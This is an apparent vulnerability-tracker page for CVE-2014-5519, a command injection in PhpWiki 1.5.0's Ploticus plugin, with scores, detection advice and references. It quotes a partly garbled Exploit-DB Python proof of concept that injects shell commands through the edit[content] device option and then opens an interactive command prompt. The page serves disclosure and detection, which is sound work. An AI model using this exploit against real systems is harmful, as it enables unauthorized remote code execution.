CVE-2014-5519
published 2014-09-11CVE-2014-5519: The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via shell metacharacters in a device option in the edit[content]…
PriorityP267high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
64.97%
99.1th percentile
The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via shell metacharacters in a device option in the edit[content] parameter to index.php/HeIp. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpwiki_project | phpwiki | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandedit[content]=-device svg -o /dev/stderr -csmap= data= alt= help= >> with shell metacharacters injected↗
- →Monitor HTTP POST requests to index.php/HeIp containing shell metacharacters (e.g., semicolons, backticks, pipe characters) within the edit[content] parameter, specifically in the device option of the Ploticus plugin. ↗
- →Detect the canary/delimiter pattern '123:::' and ':::123' in HTTP responses, which the exploit uses to extract command output from stderr redirection. ↗
- →A Metasploit module exists for this vulnerability; correlate exploit attempts against PhpWiki 1.5.0 installations at the /index.php/HeIp path with known Metasploit user-agent strings. ↗
- ·The target endpoint /index.php/HeIp is a specific wiki page name used in the exploit; the vulnerability may be triggerable via other wiki page names if the Ploticus plugin is enabled site-wide, not just on this page. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PhpWiki - Remote Command Execution
exploitdb·2014-08-28
CVE-2014-5519 PhpWiki - Remote Command Execution
PhpWiki - Remote Command Execution
---
###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
cmd2 = urllib2.urlopen(cmd1)
output = cmd2.read()
firstloc = output.find("123:::\n") + len("123:::\n")
secondloc = output.find("\n:::123")
return output[firstloc:secondloc]
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
cmd = raw_input('Run a command: ')
if cmd == 'quit':
print "[-] Hope you had fun :)"
Metasploit
Phpwiki Ploticus Remote Code Execution
metasploit
Phpwiki Ploticus Remote Code Execution
Phpwiki Ploticus Remote Code Execution
The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/110576http://packetstormsecurity.com/files/128031/PhpWiki-Ploticus-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2014/Aug/77http://seclists.org/oss-sec/2014/q3/456http://seclists.org/oss-sec/2014/q3/465http://secunia.com/advisories/60293http://www.exploit-db.com/exploits/34451http://osvdb.org/show/osvdb/110576http://packetstormsecurity.com/files/128031/PhpWiki-Ploticus-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2014/Aug/77http://seclists.org/oss-sec/2014/q3/456http://seclists.org/oss-sec/2014/q3/465http://secunia.com/advisories/60293http://www.exploit-db.com/exploits/34451
2014-09-11
Published